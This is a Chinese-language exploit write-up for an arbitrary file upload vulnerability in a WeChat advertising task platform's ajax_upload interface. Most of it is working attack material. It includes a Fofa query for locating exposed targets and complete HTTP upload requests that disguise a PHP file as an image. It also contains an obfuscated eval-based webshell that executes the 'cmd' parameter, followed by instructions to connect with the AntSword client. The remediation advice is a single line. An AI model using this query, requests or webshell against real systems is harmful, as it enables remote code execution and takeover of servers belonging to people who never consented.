0x01 漏洞描述:
微信广告任务平台ajax_upload接口处存在任意文件上传漏洞,攻击者可利用该漏洞将恶意文件上传至服务器,进而可能实现远程代码执行、篡改网站内容或发动其他形式的攻击,严重危及系统与数据安全。
位于控制器中IndexController.class.php中ajax_upload实际继承自/Common/Common/function.php中Ajax_upload方法,从源码中看文件上传类型做了限制,但是实际测试结果看并没有实际作用。
0x02 搜索语句:
Fofa:"/tpl/Public/js/func.js"
0x03 漏洞复现:
该漏洞需要一定的权限,使用系统随机注册后获取登录cookie
登录后获取到cookie
使用上述获取的cookie访问接口进行任意文件上传
POST /index.php/Home/index/ajax_upload HTTP/1.1
Host: your-ip
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCc7iBZFp1mvojsxn
Accept: */*
Origin: http://127.0.0.1
Referer: http://127.0.0.1/index.php/Home/Index/index.html
Cookie: think_language=zh-CN; BJYADMIN=d1n63hurdl5lq513q7u93tcm5g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.0.0 Safari/537.36
------WebKitFormBoundaryCc7iBZFp1mvojsxn
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundaryCc7iBZFp1mvojsxn-- 
拼接上传路径进行访问
https://your-ip/Uploads/images/2024-09-30/66fa0af46ef4f.php 
构造webshell上传
POST /index.php/Home/index/ajax_upload HTTP/1.1
Host: your-ip
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCc7iBZFp1mvojsxn
Accept: */*
Origin: http://127.0.0.1
Referer: http://127.0.0.1/index.php/Home/Index/index.html
Cookie: think_language=zh-CN; BJYADMIN=d1n63hurdl5lq513q7u93tcm5g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.0.0 Safari/537.36
------WebKitFormBoundaryCc7iBZFp1mvojsxn
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php class G778fGh9 { public function __construct($HZXo6){ @eval("/*ZGn59H2744*/".$HZXo6."/*ZGn59H2744*/"); }}new G778fGh9($_REQUEST['cmd']);?>
------WebKitFormBoundaryCc7iBZFp1mvojsxn--
使用蚁剑建立连接
0x04 修复建议:
关闭外部攻击面或者联系厂商获取补丁修复漏洞。
